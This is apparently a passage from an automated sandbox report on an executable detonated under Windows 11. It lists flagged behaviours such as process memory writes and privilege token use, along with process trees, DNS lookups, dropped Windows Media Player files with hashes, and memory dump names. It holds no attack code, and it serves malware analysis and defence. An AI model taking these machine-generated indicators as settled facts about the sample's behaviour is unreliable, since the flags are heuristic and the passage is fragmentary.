| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
| N/A | N/A | C:\Windows\system32\mspaint.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 5096 wrote to memory of 2820 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\ExpandInitialize.wmf"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 172.165.69.228:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | 228.69.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
memory/5096-0-0x0000000000400000-0x0000000000448000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241007-en
Max time kernel
116s
Max time network
96s
Command Line
Signatures
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\unregmp2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\unregmp2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
"C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe"
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe
C:\Program Files (x86)\Windows Media Player\wmplayer.exe
"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding
C:\Windows\SysWOW64\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\unregmp2.exe
"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/1964-0-0x0000000000400000-0x0000000000448000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 71ee2f4eb9e67942a01f9a0cebd7630a |
| SHA1 | 0fff9c44929276dbb68261ba1b7f9f07c9b37477 |
| SHA256 | b81de64dd2c12817227cf02ceb0d42dbe6beb2c2094d4784bc47db239178f217 |
| SHA512 | d3c9d1833bd659f500325b2f8820959c0d6347e4e92bf9c0e17306189eb6844ae466087d5e61ebddbe134c47ac81f4b0ff5d20322647afa2e846b7a1aee6f8b6 |
C:\Users\Admin\AppData\Local\Temp\wmsetup.log
| MD5 | 0e2ab4aec194f43611ae87e9029303d5 |
| SHA1 | 58e91eb77da219d8b76f54c85d887584ea819818 |
| SHA256 | 766245d0ea8891180069ed422bc56abb4484365416da49c33f1dd8e6f3a9eba2 |
| SHA512 | 7ba99c2da5b1e12749355d96800380daa9c32784bc67d509452d55b77320bfb52c21114a3c22443219a1cca906c0e817e97f04ea063fb0b10ac6a4b447348005 |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | af6d269517872336192a7639faab8795 |
| SHA1 | 0af4a4f3f49810dfe6b2bce94951e3409fcad0a4 |
| SHA256 | ce1d907a2a8bb76367c1e2439f2e82999beacdd3ca2badd5557b7cbe29cde8d5 |
| SHA512 | 4d51042c621ccd198c1d6cfd1bf894a59664bffd7cdabe10a10585be91f89626005574bd82f47e3e64ac4e22c1c3691931f2a1176d03e6abe2cd3ea4f834af2b |
memory/3736-33-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-37-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-38-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-36-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-35-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-34-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-39-0x0000000009980000-0x0000000009990000-memory.dmp
memory/3736-40-0x0000000009980000-0x0000000009990000-memory.dmp